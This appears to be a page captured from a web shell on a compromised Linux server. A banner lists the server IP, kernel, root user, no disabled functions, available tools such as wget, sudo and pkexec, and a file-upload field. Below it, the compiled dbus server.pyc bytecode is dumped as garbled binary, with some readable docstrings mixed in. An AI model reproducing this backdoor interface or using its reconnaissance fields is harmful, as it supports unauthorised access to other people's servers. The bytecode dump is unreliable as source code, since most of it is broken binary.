| Server IP : 39.108.156.168 / Your IP : 216.73.216.104 Web Server : nginx/1.24.0 System : Linux e2.ksyuki.com 6.11.0-25-generic #25~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 17:20:50 UTC 2 x86_64 User : root ( 0) PHP Version : 8.3.6 Disable Function : NONE MySQL : OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /usr/lib/python3/dist-packages/dbus/__pycache__/ |
Upload File : |
�
� z]1 � �: � d Z dZddlmZ ddlmZ G d� de� Zy))�Server�reStructuredText� )�_Server)�
Connectionc � � � e Zd ZdZeddf� fd� Zd� Zd� Zd� Zd� Z e
ej � Z
e
ej � Z e
ej � Z� xZS )r a% An opaque object representing a server that listens for connections from
other applications.
This class is not useful to instantiate directly: you must subclass it and
either extend the method connection_added, or append to the
list on_connection_added.
:Since: 0.83
Nc �2 �� t t | � | ||||� S )a� Construct a new Server.
:Parameters:
`address` : str
Listen on this address.
`connection_class` : type
When new connections come in, instantiate this subclass
of dbus.connection.Connection to represent them.
The default is Connection.
`mainloop` : dbus.mainloop.NativeMainLoop or None
The main loop with which to associate the new connections.
`auth_mechanisms` : sequence of str
Authentication mechanisms to allow. The default is to allow
any authentication mechanism supported by ``libdbus``.
)�superr �__new__)�cls�address�connection_class�mainloop�auth_mechanisms� __class__s ��-/usr/lib/python3/dist-packages/dbus/server.pyr
zServer.__new__+ s% �� �"